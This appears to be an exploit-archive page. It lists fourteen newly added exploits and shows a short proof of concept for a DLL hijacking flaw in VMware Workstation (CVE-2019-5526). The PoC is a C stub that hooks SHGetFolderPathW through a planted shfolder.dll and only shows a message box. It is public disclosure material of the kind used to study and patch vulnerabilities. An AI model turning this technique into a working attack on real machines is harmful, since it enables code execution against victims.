a91c0acafc
14 changes to exploits/shellcodes Sandboxie 5.30 - 'Programs Alerts' Denial of Service (PoC) CEWE Photoshow 6.4.3 - 'Password' Denial of Service (PoC) CEWE Photo Importer 6.4.3 - '.jpg' Denial of Service (PoC) WeChat for Android 7.0.4 - 'vcodec2_hls_filter' Denial of Service ZOC Terminal 7.23.4 - 'Script' Denial of Service (PoC) ZOC Terminal v7.23.4 - 'Private key file' Denial of Service (PoC) ZOC Terminal v7.23.4 - 'Shell' Denial of Service (PoC) Axessh 4.2 - 'Log file name' Denial of Service (PoC) SEL AcSELerator Architect 2.2.24 - CPU Exhaustion Denial of Service Iperius Backup 6.1.0 - Privilege Escalation VMware Workstation 15.1.0 - DLL Hijacking JetAudio jetCast Server 2.0 - 'Log Directory' Local SEH Alphanumeric Encoded Buffer Overflow DeepSound 1.0.4 - SQL Injection Interspire Email Marketer 6.20 - 'surveys_submit.php' Remote Code Execution
34 lines
No EOL
855 B
Text
34 lines
No EOL
855 B
Text
#---------------------------------------------------------
|
|
# Title: VMware Workstation DLL hijacking < 15.1.0
|
|
# Date: 2019-05-14
|
|
# Author: Miguel Mendez Z. & Claudio Cortes C.
|
|
# Team: www.exploiting.cl
|
|
# Vendor: https://www.vmware.com
|
|
# Version: VMware Workstation Pro / Player (Workstation)
|
|
# Tested on: Windows Windows 7_x86/7_x64 [eng]
|
|
# Cve: CVE-2019-5526
|
|
#---------------------------------------------------------
|
|
|
|
|
|
Description:
|
|
|
|
VMware Workstation contains a DLL hijacking issue because some DLL.
|
|
|
|
|
|
DLL Hijacking: shfolder.dll
|
|
Hooking: SHGetFolderPathW()
|
|
|
|
------Code_Poc-------
|
|
#include "dll.h"
|
|
#include <windows.h>
|
|
|
|
DLLIMPORT void SHGetFolderPathW()
|
|
{
|
|
MessageBox(0, "s1kr10s", "VMWare-Poc", MB_ICONINFORMATION);
|
|
exit(0);
|
|
}
|
|
|
|
--------------------------
|
|
|
|
|
|
https://www.vmware.com/security/advisories/VMSA-2019-0007.html |